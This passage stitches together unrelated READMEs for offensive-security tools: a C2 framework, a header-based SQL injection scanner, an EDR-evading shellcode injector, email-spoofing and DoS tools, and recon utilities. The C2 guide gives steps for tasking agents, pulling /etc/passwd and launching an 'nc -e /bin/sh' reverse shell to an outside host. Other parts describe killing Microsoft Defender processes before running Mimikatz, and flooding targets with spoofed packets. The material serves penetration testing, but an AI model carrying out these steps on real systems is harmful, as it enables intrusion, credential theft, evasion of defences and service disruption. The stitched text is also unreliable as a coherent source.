Drops the database so that the active agents will be registered again.
exit
Bye Bye!
Sessions:
sessions server arg [port]
Controls a session handler.
arg: can have the following values: 'start', 'stop', 'status'
port: port is optional for the start arg and if it is not provided it defaults to 5555. This argument defines the port of the sessions server
sessions select arg
Select in which session to attach.
arg: the index from the 'sessions list' result
sessions close arg
Close a session.
arg: the index from the 'sessions list' result
sessions list
Displays the available sessions
local-ls directory
Lists the files of the selected directory on your host
download 'file'
Downloads the 'file' locally into the current directory
upload 'file'
Uploads a file in the directory where the agent currently is
Special attention should be given to the 'find active agents' command. This command deletes all the tables and creates them again. It might sound scary, but it is not; at least that is what I believe :P
The idea behind this functionality is that the c2 server can ask an agent to re-register in case it doesn't recognize it. So, since we want to clear the db of unused old entries and at the same time find all the currently active hosts, we can drop the tables and trigger the re-registration mechanism of the c2 server. See below for the re-registration mechanism.
Below you can find a normal flow diagram
If the environment experiences a major failure, like a corrupted database or some other critical failure, the re-registration mechanism kicks in so we don't lose the connection with our agents.
More specifically, if we lose the database we will not have any information about the uuids we are receiving, so we can't set tasks on them. The agents will keep trying to retrieve their tasks, and since we don't recognize them we will ask them to register again so we can insert them into our database and control them again.
Below is the flow diagram for this case.
To set up your environment, start admin.py first, then c2_server.py, and run the agent. Afterwards you can check the available agents.
# show all available agents
show agent all
To instruct all the agents to run the command "id" you can do it like this:
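Based on the task syntax described above, the command would be along these lines:
task add all c2-shell id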
# check the results of a specific agent
show result 85913eb1245d40eb96cf53eaf0b1e241
You can also change the interval at which the agents check for tasks to 30 seconds like this:
# to set it for all agents
task add all c2-sleep 30
To open a session with one or more of your agents do the following.
# find the agent/uuid
show agent all
# enable the server to accept connections
sessions server start 5555
# add a task for a session to your preferred agent
task add your_prefered_agent_uuid_here c2-session 5555
# display a list of available connections
sessions list
# select to attach to one of the sessions, lets select 0
sessions select 0
# run a command
id
# download the passwd file locally
download /etc/passwd
# list your files locally to check that passwd was created
local-ls
# upload a file (test.txt) in the directory where the agent is
upload test.txt
# return to the main cli
go back
# check if the server is running
sessions server status
# stop the sessions server
sessions server stop
If for some reason you want to run another external session, like with netcat or Metasploit, do the following.
# show all available agents
show agent all
# first open a netcat on your machine
nc -vnlp 4444
# add a task to open a reverse shell for a specific agent
task add 85913eb1245d40eb96cf53eaf0b1e241 c2-shell nc -e /bin/sh 192.168.1.3 4444
This way you will have a 'die hard' shell: even if you get disconnected, it will come back up immediately. Only interactive commands will make it die permanently.
The Python agent offers obfuscation using basic AES ECB encryption and base64 encoding.
Edit the obfuscator.py file and change the 'key' value to a 16-character key in order to create a custom payload. The output of the new agent can be found in Agents/obs_agent.py.
You can run it like this:
python3 obfuscator.py
# and to run the agent, do as usual
python3 obs_agent.py
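For illustration only, the kind of transformation described above (AES ECB plus base64 over the agent source) can be sketched as follows. This is a hedged example under assumed file names, using the pycryptodome library; it is not the project's actual obfuscator.py:

import base64
from Crypto.Cipher import AES          # pycryptodome
from Crypto.Util.Padding import pad

key = b"0123456789abcdef"              # 16-character key, as described above

with open("agent.py", "rb") as f:      # assumed input file name
    plaintext = f.read()

cipher = AES.new(key, AES.MODE_ECB)
blob = base64.b64encode(cipher.encrypt(pad(plaintext, AES.block_size)))

# An obfuscated agent would embed this blob and reverse the steps at runtime
with open("obs_agent_payload.b64", "wb") as f:   # hypothetical output name
    f.write(blob)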
gunicorn -w 4 "c2_server:create_app()" --access-logfile=- -b 0.0.0.0:5000 --certfile server.crt --keyfile server.key
pip install pyinstaller
pyinstaller --onefile agent.py
The binary can be found under the dist directory.
In case something fails, you may need to update your Python and pip libs. If it continues failing then... well... life happened.
Create new certs in each engagement
Backup your c2.db, it is easy... just a file
pytest was used for the testing. You can run the tests like this:
cd tests/
py.test
Be careful: you must run the tests inside the tests directory, otherwise your c2.db will be overwritten and you will lose your data.
To check the code coverage and produce a nice html report you can use this:
# pip3 install pytest-cov
python -m pytest --cov=Commander --cov-report html
Disclaimer: This tool is only intended to be a proof of concept demonstration tool for authorized security testing. Running this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.
HBSQLI is an automated command-line tool for performing Header Based Blind SQL injection attacks on web applications. It automates the process of detecting Header Based Blind SQL injection vulnerabilities, making it easier for security researchers, penetration testers & bug bounty hunters to test the security of web applications.
This tool is intended for authorized penetration testing and security assessment purposes only. Any unauthorized or malicious use of this tool is strictly prohibited and may result in legal action.
The authors and contributors of this tool do not take any responsibility for any damage, legal issues, or other consequences caused by the misuse of this tool. The use of this tool is solely at the user's own risk.
Users are responsible for complying with all applicable laws and regulations regarding the use of this tool, including but not limited to, obtaining all necessary permissions and consents before conducting any testing or assessment.
By using this tool, users acknowledge and accept these terms and conditions and agree to use this tool in accordance with all applicable laws and regulations.
Install HBSQLI with following steps:
$ git clone https://github.com/SAPT01/HBSQLI.git
$ cd HBSQLI
$ pip3 install -r requirements.txt
usage: hbsqli.py [-h] [-l LIST] [-u URL] -p PAYLOADS -H HEADERS [-v]
options:
-h, --help show this help message and exit
-l LIST, --list LIST To provide list of urls as an input
-u URL, --url URL To provide single url as an input
-p PAYLOADS, --payloads PAYLOADS
To provide payload file having Blind SQL Payloads with delay of 30 sec
-H HEADERS, --headers HEADERS
To provide header file having HTTP Headers which are to be injected
-v, --verbose Run on verbose mode
$ python3 hbsqli.py -u "https://target.com" -p payloads.txt -H headers.txt -v
$ python3 hbsqli.py -l urls.txt -p payloads.txt -H headers.txt -v
There are basically two modes: verbose, which shows you the whole process as it happens and the status of each test done, and non-verbose, which just prints the vulnerable ones on the screen. To initiate verbose mode, just add -v to your command.
You can use the provided payload file or use a custom payload file, just remember that delay in each payload in the payload file should be set to 30 seconds.
You can use the provided headers file, or add more custom headers to that file according to your needs.
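As background, header-based blind SQL injection of this kind is typically detected by timing: if a time-delay payload injected into a header makes the response take roughly the payload's delay, that header is likely injectable. A minimal sketch, illustrative only and not HBSQLI's code; the URL, header and payload are assumptions:

import time
import requests

url = "https://target.com"               # assumed target
payload = "' AND SLEEP(30)-- -"          # assumed 30-second delay payload

start = time.time()
requests.get(url, headers={"User-Agent": payload}, timeout=60)
elapsed = time.time() - start

# A response taking close to 30 seconds suggests the header value reached a SQL query
print(f"elapsed: {elapsed:.1f}s", "-> possibly vulnerable" if elapsed >= 29 else "")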
(Currently) Fully Undetected same-process native/.NET assembly shellcode injector based on RecycledGate by thefLink, which is also based on HellsGate + HalosGate + TartarusGate to ensure undetectable native syscalls even if one technique fails.
To remain stealthy and keep entropy on the final executable low, do ensure that shellcode is always loaded externally since most AV/EDRs won't check for signatures on non-executable or DLL files anyway.
Important to also note that the fully undetected part refers to the loading of the shellcode; the shellcode itself will still be subject to behavior monitoring, so make sure the loaded executable also makes use of defense evasion techniques (e.g., SharpKatz, which features DInvoke, instead of Mimikatz).
.\RecycledInjector.exe <path_to_shellcode_file>
This proof of concept leverages Terminator by ZeroMemoryEx to kill most security solution/agents present on the system. It is used against Microsoft Defender for Endpoint EDR.
On the left we inject the Terminator shellcode to load the vulnerable driver and kill MDE processes, and on the right is an example of loading and executing Invoke-Mimikatz remotely from memory, which is not stopped as there is no running security solution anymore on the system.
Spoofy
is a program that checks if a list of domains can be spoofed based on SPF and DMARC records. You may be asking, "Why do we need another tool that can check if a domain can be spoofed?"
Well, Spoofy is different and here is why:
- Authoritative lookups on all lookups with known fallback (Cloudflare DNS)
- Accurate bulk lookups
- Custom, manually tested spoof logic (No guessing or speculating, real world test results)
- SPF lookup counter
Spoofy
requires Python 3+. Python 2 is not supported. Usage is shown below:
Usage:
./spoofy.py -d [DOMAIN] -o [stdout or xls]
OR
./spoofy.py -iL [DOMAIN_LIST] -o [stdout or xls]
Install Dependencies:
pip3 install -r requirements.txt
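Under the hood, checks like this start from the domain's SPF and DMARC TXT records; a minimal sketch with dnspython, given as an illustrative assumption rather than Spoofy's actual implementation:

import dns.resolver  # dnspython

domain = "example.com"  # assumed target

def txt_records(name):
    try:
        return [r.to_text().strip('"') for r in dns.resolver.resolve(name, "TXT")]
    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer):
        return []

spf = [r for r in txt_records(domain) if r.startswith("v=spf1")]
dmarc = [r for r in txt_records(f"_dmarc.{domain}") if r.lower().startswith("v=dmarc1")]

# The spoofability verdict then depends on the combination of the SPF qualifier
# (~all, -all, ?all) and the DMARC policy (p=none/quarantine/reject).
print("SPF:  ", spf or "none")
print("DMARC:", dmarc or "none")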
(The spoofability table lists every combination of SPF and DMARC configurations that impact deliverability to the inbox, except for DKIM modifiers.) Download Here
The creation of the spoofability table involved listing every relevant SPF and DMARC configuration, combining them, and then conducting SPF and DMARC information collection using an early version of Spoofy on a large number of US government domains. Testing if an SPF and DMARC combination was spoofable or not was done using the email security pentesting suite at emailspooftest using Microsoft 365. However, the initial testing was conducted using Protonmail and Gmail, but these services were found to utilize reverse lookup checks that affected the results, particularly for subdomain spoof testing. As a result, Microsoft 365 was used for the testing, as it offered greater control over the handling of mail.
After the initial testing using Microsoft 365, some combinations were retested using Protonmail and Gmail due to the differences in their handling of banners in emails. Protonmail and Gmail can place spoofed mail in the inbox with a banner or in spam without a banner, leading to some SPF and DMARC combinations being reported as "Mailbox Dependent" when using Spoofy. In contrast, Microsoft 365 places both conditions in spam. The testing and data collection process took several days to complete, after which a good master table was compiled and used as the basis for the Spoofy spoofability logic.
This tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this tool and software.
Lead / Only programmer & spoofability logic comprehension upgrades & lookup resiliency system / fix (main issue with other tools) & multithreading & feature additions: Matt Keeley
DMARC, SPF, DNS insights & Spoofability table creation/confirmation/testing & application accuracy/quality assurance: calamity.email / eman-ekaf
Logo: cobracode
Tool was inspired by Bishop Fox's project called spoofcheck.
ModuleShifting is a stealthier variation of the Module Stomping and Module Overloading injection techniques. It is implemented in Python ctypes so that it can be executed fully in memory via a Python interpreter and Pyramid, thus avoiding the use of compiled loaders.
The technique can be used with PE or shellcode payloads, however, the stealthier variation is to be used with shellcode payloads that need to be functionally independent from the final payload that the shellcode is loading.
ModuleShifting, when used with shellcode payload, is performing the following operations:
When using a PE payload, ModuleShifting will perform the following operation:
ModuleShifting can be used to inject a payload without dynamically allocating memory (i.e. VirtualAlloc) and compared to Module Stomping and Module Overloading is stealthier because it decreases the amount of IoCs generated by the injection technique itself.
There are 3 main differences between Module Shifting and some public implementations of Module stomping (one from Bobby Cooke and WithSecure)
The differences between Module Shifting and Module Overloading are the following:
Using a functionally independent shellcode payload such as an AceLdr Beacon Stageless shellcode payload, ModuleShifting is able to locally inject without dynamically allocating memory and at the moment generating zero IoC on a Moneta and PE-Sieve scan. I am aware that the AceLdr sleeping payloads can be caught with other great tools such as Hunt-Sleeping-Beacon, but the focus here is on the injection technique itself, not on the payload. In our case what is enabling more stealthiness in the injection is the shellcode functional independence, so that the written malicious bytes can be restored to its original content, effectively erasing the traces of the injection.
All information and content is provided for educational purposes only. Follow instructions at your own risk. Neither the author nor his employer are responsible for any direct or consequential damage or loss arising from any person or organization.
This work has been made possible because of the knowledge and tools shared by incredible people like Aleksandra Doniec @hasherezade, Forest Orr and Kyle Avery. I heavily used Moneta, PeSieve, PE-Bear and AceLdr throughout all my learning process and they have been key for my understanding of this topic.
ModuleShifting can be used with Pyramid and a Python interpreter to execute the local process injection fully in-memory, avoiding compiled loaders.
git clone https://github.com/naksyn/Pyramid
python3 pyramid.py -u testuser -pass testpass -p 443 -enc chacha20 -passenc superpass -generate -server 192.168.1.2 -setcradle moduleshifting.py
To successfully execute this technique you should use a shellcode payload that is capable of loading an additional self-sustainable payload in another area of memory. ModuleShifting has been tested with AceLdr payload, which is capable of loading an entire copy of Beacon on the heap, so breaking the functional dependency with the initial shellcode. This technique would work with any shellcode payload that has similar capabilities. So the initial shellcode becomes useless once executed and there's no reason to keep it in memory as an IoC.
A hosting dll with enough space for the shellcode on the targeted section should also be chosen, otherwise the technique will fail.
Module Stomping and Module Shifting need to write shellcode on a legitimate dll memory space. ModuleShifting will eliminate this IoC after the cleanup phase but indicators could be spotted by scanners with realtime inspection capabilities.
ICMP Packet Sniffer is a Python program that allows you to capture and analyze ICMP (Internet Control Message Protocol) packets on a network interface. It provides detailed information about the captured packets, including source and destination IP addresses, MAC addresses, ICMP type, payload data, and more. The program can also store the captured packets in a SQLite database and save them in a pcap format.
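For background, ICMP capture of this kind can be sketched with scapy's sniff; an illustrative sketch only, not ICMPWatch's actual code, and the interface name is an assumption:

from scapy.all import ICMP, IP, sniff

def show(pkt):
    # Print the basic fields ICMPWatch also reports: addresses, ICMP type, packet length
    if pkt.haslayer(ICMP) and pkt.haslayer(IP):
        print(pkt[IP].src, "->", pkt[IP].dst, "type", pkt[ICMP].type, "len", len(pkt))

sniff(iface="eth0", filter="icmp", prn=show, timeout=300)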
git clone https://github.com/HalilDeniz/ICMPWatch.git
pip install -r requirements.txt
python ICMPWatch.py [-h] [-v] [-t TIMEOUT] [-f FILTER] [-o OUTPUT] [--type {0,8}] [--src-ip SRC_IP] [--dst-ip DST_IP] -i INTERFACE [-db] [-c CAPTURE]
-v or --verbose: Show verbose packet details.
-t or --timeout: Sniffing timeout in seconds (default is 300 seconds).
-f or --filter: BPF filter for packet sniffing (default is "icmp").
-o or --output: Output file to save captured packets.
--type: ICMP packet type to filter (0: Echo Reply, 8: Echo Request).
--src-ip: Source IP address to filter.
--dst-ip: Destination IP address to filter.
-i or --interface: Network interface to capture packets (required).
-db or --database: Store captured packets in an SQLite database.
-c or --capture: Capture file to save packets in pcap format.
Press Ctrl+C to stop the sniffing process.
python icmpwatch.py -i eth0
python dnssnif.py -i eth0 -o icmp_results.txt
python icmpwatch.py -i eth0 --src-ip 192.168.1.10 --dst-ip 192.168.1.20
python icmpwatch.py -i eth0 --type 8
python icmpwatch.py -i eth0 -c captured_packets.pcap
DoSinator is a versatile Denial of Service (DoS) testing tool developed in Python. It empowers security professionals and researchers to simulate various types of DoS attacks, allowing them to assess the resilience of networks, systems, and applications against potential cyber threats.
Clone the repository:
git clone https://github.com/HalilDeniz/DoSinator.git
Navigate to the project directory:
cd DoSinator
Install the required dependencies:
pip install -r requirements.txt
usage: dos_tool.py [-h] -t TARGET -p PORT [-np NUM_PACKETS] [-ps PACKET_SIZE]
[-ar ATTACK_RATE] [-d DURATION] [-am {syn,udp,icmp,http,dns}]
[-sp SPOOF_IP] [--data DATA]
optional arguments:
-h, --help Show this help message and exit.
-t TARGET, --target TARGET
Target IP address.
-p PORT, --port PORT Target port number.
-np NUM_PACKETS, --num_packets NUM_PACKETS
Number of packets to send (default: 500).
-ps PACKET_SIZE, --packet_size PACKET_SIZE
Packet size in bytes (default: 64).
-ar ATTACK_RATE, --attack_rate ATTACK_RATE
Attack rate in packets per second (default: 10).
-d DURATION, --duration DURATION
Duration of the attack in seconds.
-am {syn,udp,icmp,http,dns}, --attack-mode {syn,udp,icmp,http,dns}
Attack mode (default: syn).
-sp SPOOF_IP, --spoof-ip SPOOF_IP
Spoof IP address.
--data DATA Custom data string to send.
target_ip: IP address of the target system.
target_port: Port number of the target service.
num_packets: Number of packets to send (default: 500).
packet_size: Size of each packet in bytes (default: 64).
attack_rate: Attack rate in packets/second (default: 10).
duration: Duration of the attack in seconds.
attack_mode: Attack mode: syn, udp, icmp, http (default: syn).
spoof_ip: Spoof IP address (default: None).
data: Custom data string to send.
The usage of the Dosinator tool for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws. The author assumes no liability and is not responsible for any misuse or damage caused by this program.
By using Dosinator, you agree to use this tool for educational and ethical purposes only. The author is not responsible for any actions or consequences resulting from misuse of this tool.
Please ensure that you have the necessary permissions to conduct any form of testing on a target network. Use this tool at your own risk.
Contributions are welcome! If you find any issues or have suggestions for improvements, feel free to open an issue or submit a pull request.
If you have any questions, comments, or suggestions about Dosinator, please feel free to contact me:
xsubfind3r
is a command-line interface (CLI) utility to find domain's known subdomains from curated passive online sources.
Fetches domains from curated passive sources to maximize results.
Supports stdin
and stdout
for easy integration into workflows.
Cross-Platform (Windows, Linux & macOS).
Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget
or curl
:
...with wget
:
wget https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz
...or, with curl
:
curl -OL https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz
...then, extract the binary:
tar xf xsubfind3r-<version>-linux-amd64.tar.gz
TIP: The above steps, download and extract, can be combined into a single step with this one-liner:
curl -sL https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz | tar -xzv
NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xsubfind3r
executable.
...move the xsubfind3r
binary to somewhere in your PATH
. For example, on GNU/Linux and OS X systems:
sudo mv xsubfind3r /usr/local/bin/
NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r
to their PATH
.
Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.
go install ...
go install -v github.com/hueristiq/xsubfind3r/cmd/xsubfind3r@latest
go build ...
the development version
Clone the repository
git clone https://github.com/hueristiq/xsubfind3r.git
Build the utility
cd xsubfind3r/cmd/xsubfind3r && \
go build .
Move the xsubfind3r
binary to somewhere in your PATH
. For example, on GNU/Linux and OS X systems:
sudo mv xsubfind3r /usr/local/bin/
NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r
to their PATH
.
NOTE: While the development version is a good way to take a peek at xsubfind3r
's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.
xsubfind3r
will work right after installation. However, BeVigil, Chaos, Fullhunt, Github, Intelligence X and Shodan require API keys to work; URLScan supports an API key but does not require one. The API keys are stored in the $HOME/.hueristiq/xsubfind3r/config.yaml
file, created upon first run, which uses the YAML format. Multiple API keys can be specified for each of these sources, from which one will be used.
Example config.yaml
:
version: 0.3.0
sources:
- alienvault
- anubis
- bevigil
- chaos
- commoncrawl
- crtsh
- fullhunt
- github
- hackertarget
- intelx
- shodan
- urlscan
- wayback
keys:
bevigil:
- awA5nvpKU3N8ygkZ
chaos:
- d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39asdsd54bbc1aabb208c9acfb
fullhunt:
- 0d9652ce-516c-4315-b589-9b241ee6dc24
github:
- d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
- asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
intelx:
- 2.intelx.io:00000000-0000-0000-0000-000000000000
shodan:
- AAAAClP1bJJSRMEYJazgwhJKrggRwKA
urlscan:
- d4c85d34-e425-446e-d4ab-f5a3412acbe8
To display help message for xsubfind3r
use the -h
flag:
xsubfind3r -h
help message:
_ __ _ _ _____
__ _____ _ _| |__ / _(_)_ __ __| |___ / _ __
\ \/ / __| | | | '_ \| |_| | '_ \ / _` | |_ \| '__|
> <\__ \ |_| | |_) | _| | | | | (_| |___) | |
/_/\_\___/\__,_|_.__/|_| |_|_| |_|\__,_|____/|_| v0.3.0
USAGE:
xsubfind3r [OPTIONS]
INPUT:
-d, --domain string[] target domains
-l, --list string target domains' list file path
SOURCES:
--sources bool list supported sources
-u, --sources-to-use string[] comma(,) separeted sources to use
-e, --sources-to-exclude string[] comma(,) separeted sources to exclude
OPTIMIZATION:
-t, --threads int number of threads (default: 50)
OUTPUT:
--no-color bool disable colored output
-o, --output string output subdomains' file path
-O, --output-directory string output subdomains' directory path
-v, --verbosity string debug, info, warning, error, fatal or silent (default: info)
CONFIGURATION:
-c, --configuration string configuration file path (default: ~/.hueristiq/xsubfind3r/config.yaml)
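A typical invocation, based on the flags above (the domain and output path are placeholders):

xsubfind3r -d example.com -o example.com.subdomains.txt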
Issues and Pull Requests are welcome! Check out the contribution guidelines.
This utility is distributed under the MIT license.
This project was built by pentesters for pentesters. Redeye is a tool intended to help you manage your data during a pentest operation in the most efficient and organized way.
Daniel Arad - @dandan_arad && Elad Pticha - @elad_pt
The Server panel will display all added servers and basic information about each server, such as: owned users, open ports and whether it has been pwned.
After entering a server, an edit panel will appear. We can add new users found on the server, found vulnerabilities, and other relevant items and files.
The Users panel contains all found users from all servers. The users are categorized by permission level and type. Those details can be changed by hovering over the username.
Files panel will display all the files from the current pentest. A team member can upload and download those files.
Attack vector panel will display all found attack vectors with Severity/Plausibility/Risk graphs.
PreReport panel will contain all the screenshots from the current pentest.
Graph panel will contain all of the Users and Servers and the relationship between them.
APIs allow users to effortlessly retrieve data by making simple API requests.
curl redeye.local:8443/api/servers --silent -H "Token: redeye_61a8fc25-105e-4e70-9bc3-58ca75e228ca" | jq
curl redeye.local:8443/api/users --silent -H "Token: redeye_61a8fc25-105e-4e70-9bc3-58ca75e228ca" | jq
curl redeye.local:8443/api/exploits --silent -H "Token: redeye_61a8fc25-105e-4e70-9bc3-58ca75e228ca" | jq
Pull from GitHub container registry.
git clone https://github.com/redeye-framework/Redeye.git
cd Redeye
docker-compose up -d
Start/Stop the container
sudo docker-compose start/stop
Save/Load Redeye
docker save ghcr.io/redeye-framework/redeye:latest neo4j:4.4.9 > Redeye.tar
docker load < Redeye.tar
GitHub container registry: https://github.com/redeye-framework/Redeye/pkgs/container/redeye
git clone https://github.com/redeye-framework/Redeye.git
cd Redeye
sudo apt install python3.8-venv
python3 -m venv RedeyeVirtualEnv
source RedeyeVirtualEnv/bin/activate
pip3 install -r requirements.txt
python3 RedDB/db.py
python3 redeye.py --safe
Redeye will listen on: http://0.0.0.0:8443
Default Credentials:
Neo4j will listen on: http://0.0.0.0:7474
Default Credentials:
Sidebar
flowchart
download.js
dropzone
Pictures and Icons
Logs
If you own any Code/File in Redeye that is not under MIT License please contact us at: redeye.framework@gmail.com
xcrawl3r
is a command-line interface (CLI) utility to recursively crawl webpages, i.e. systematically browse webpages' URLs and follow links to discover linked webpages' URLs.
Parses files for URLs (.js, .json, .xml, .csv, .txt & .map).
Parses robots.txt for URLs.
Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget
or curl
:
...with wget
:
wget https://github.com/hueristiq/xcrawl3r/releases/download/v<version>/xcrawl3r-<version>-linux-amd64.tar.gz
...or, with curl
:
curl -OL https://github.com/hueristiq/xcrawl3r/releases/download/v<version>/xcrawl3r-<version>-linux-amd64.tar.gz
...then, extract the binary:
tar xf xcrawl3r-<version>-linux-amd64.tar.gz
TIP: The above steps, download and extract, can be combined into a single step with this one-liner:
curl -sL https://github.com/hueristiq/xcrawl3r/releases/download/v<version>/xcrawl3r-<version>-linux-amd64.tar.gz | tar -xzv
NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xcrawl3r
executable.
...move the xcrawl3r
binary to somewhere in your PATH
. For example, on GNU/Linux and OS X systems:
sudo mv xcrawl3r /usr/local/bin/
NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xcrawl3r
to their PATH
.
Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.
go install ...
go install -v github.com/hueristiq/xcrawl3r/cmd/xcrawl3r@latest
go build ...
the development version
Clone the repository
git clone https://github.com/hueristiq/xcrawl3r.git
Build the utility
cd xcrawl3r/cmd/xcrawl3r && \
go build .
Move the xcrawl3r
binary to somewhere in your PATH
. For example, on GNU/Linux and OS X systems:
sudo mv xcrawl3r /usr/local/bin/
NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xcrawl3r
to their PATH
.
NOTE: While the development version is a good way to take a peek at xcrawl3r
's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.
To display help message for xcrawl3r
use the -h
flag:
xcrawl3r -h
help message:
_ _____
__ _____ _ __ __ ___ _| |___ / _ __
\ \/ / __| '__/ _` \ \ /\ / / | |_ \| '__|
> < (__| | | (_| |\ V V /| |___) | |
/_/\_\___|_| \__,_| \_/\_/ |_|____/|_| v0.1.0
A CLI utility to recursively crawl webpages.
USAGE:
xcrawl3r [OPTIONS]
INPUT:
-d, --domain string domain to match URLs
--include-subdomains bool match subdomains' URLs
-s, --seeds string seed URLs file (use `-` to get from stdin)
-u, --url string URL to crawl
CONFIGURATION:
--depth int maximum depth to crawl (default 3)
TIP: set it to `0` for infinite recursion
--headless bool If true the browser will be displayed while crawling.
-H, --headers string[] custom header to include in requests
e.g. -H 'Referer: http://example.com/'
TIP: use multiple flag to set multiple headers
--proxy string[] Proxy URL (e.g: http://127.0.0.1:8080)
TIP: use multiple flag to set multiple proxies
--render bool utilize a headless chrome instance to render pages
--timeout int time to wait for request in seconds (default: 10)
--user-agent string User Agent to use (default: web)
TIP: use `web` for a random web user-agent,
`mobile` for a random mobile user-agent,
or you can set your specific user-agent.
RATE LIMIT:
-c, --concurrency int number of concurrent fetchers to use (default 10)
--delay int delay between each request in seconds
--max-random-delay int maximux extra randomized delay added to `--dalay` (default: 1s)
-p, --parallelism int number of concurrent URLs to process (default: 10)
OUTPUT:
--debug bool enable debug mode (default: false)
-m, --monochrome bool coloring: no colored output mode
-o, --output string output file to write found URLs
-v, --verbosity string debug, info, warning, error, fatal or silent (default: debug)
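A typical invocation, based on the flags above (the domain, seed URL and output path are placeholders):

xcrawl3r -d example.com -u https://example.com --depth 2 -o example.com.urls.txt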
Issues and Pull Requests are welcome! Check out the contribution guidelines.
This utility is distributed under the MIT license.
Alternatives - Check out projects below, that may fit in your workflow:
xurlfind3r
is a command-line interface (CLI) utility to find domain's known URLs from curated passive online sources.
Parses URLs from robots.txt snapshots.
Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget
or curl
:
...with wget
:
wget https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz
...or, with curl
:
curl -OL https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz
...then, extract the binary:
tar xf xurlfind3r-<version>-linux-amd64.tar.gz
TIP: The above steps, download and extract, can be combined into a single step with this one-liner:
curl -sL https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz | tar -xzv
NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xurlfind3r
executable.
...move the xurlfind3r
binary to somewhere in your PATH
. For example, on GNU/Linux and OS X systems:
sudo mv xurlfind3r /usr/local/bin/
NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r
to their PATH
.
Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.
go install ...
go install -v github.com/hueristiq/xurlfind3r/cmd/xurlfind3r@latest
go build ...
the development version
Clone the repository
git clone https://github.com/hueristiq/xurlfind3r.git
Build the utility
cd xurlfind3r/cmd/xurlfind3r && \
go build .
Move the xurlfind3r
binary to somewhere in your PATH
. For example, on GNU/Linux and OS X systems:
sudo mv xurlfind3r /usr/local/bin/
NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r
to their PATH
.
NOTE: While the development version is a good way to take a peek at xurlfind3r
's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.
xurlfind3r
will work right after installation. However, BeVigil, Github and Intelligence X require API keys to work; URLScan supports an API key but does not require one. The API keys are stored in the $HOME/.hueristiq/xurlfind3r/config.yaml
file, created upon first run, which uses the YAML format. Multiple API keys can be specified for each of these sources, from which one will be used.
Example config.yaml
:
version: 0.2.0
sources:
- bevigil
- commoncrawl
- github
- intelx
- otx
- urlscan
- wayback
keys:
bevigil:
- awA5nvpKU3N8ygkZ
github:
- d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
- asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
intelx:
- 2.intelx.io:00000000-0000-0000-0000-000000000000
urlscan:
- d4c85d34-e425-446e-d4ab-f5a3412acbe8
To display help message for xurlfind3r
use the -h
flag:
xurlfind3r -h
help message:
_ __ _ _ _____
__ ___ _ _ __| |/ _(_)_ __ __| |___ / _ __
\ \/ / | | | '__| | |_| | '_ \ / _` | |_ \| '__|
> <| |_| | | | | _| | | | | (_| |___) | |
/_/\_\\__,_|_| |_|_| |_|_| |_|\__,_|____/|_| v0.2.0
USAGE:
xurlfind3r [OPTIONS]
TARGET:
-d, --domain string (sub)domain to match URLs
SCOPE:
--include-subdomains bool match subdomain's URLs
SOURCES:
-s, --sources bool list sources
-u, --use-sources string sources to use (default: bevigil,commoncrawl,github,intelx,otx,urlscan,wayback)
--skip-wayback-robots bool with wayback, skip parsing robots.txt snapshots
--skip-wayback-source bool with wayback , skip parsing source code snapshots
FILTER & MATCH:
-f, --filter string regex to filter URLs
-m, --match string regex to match URLs
OUTPUT:
--no-color bool no color mode
-o, --output string output URLs file path
-v, --verbosity string debug, info, warning, error, fatal or silent (default: info)
CONFIGURATION:
-c, --configuration string configuration file path (default: ~/.hueristiq/xurlfind3r/config.yaml)
xurlfind3r -d hackerone.com --include-subdomains
# filter images
xurlfind3r -d hackerone.com --include-subdomains -f '`^https?://[^/]*?/.*\.(jpg|jpeg|png|gif|bmp)(\?[^\s]*)?$`'
# match js URLs
xurlfind3r -d hackerone.com --include-subdomains -m '^https?://[^/]*?/.*\.js(\?[^\s]*)?$'
Issues and Pull Requests are welcome! Check out the contribution guidelines.
This utility is distributed under the MIT license.
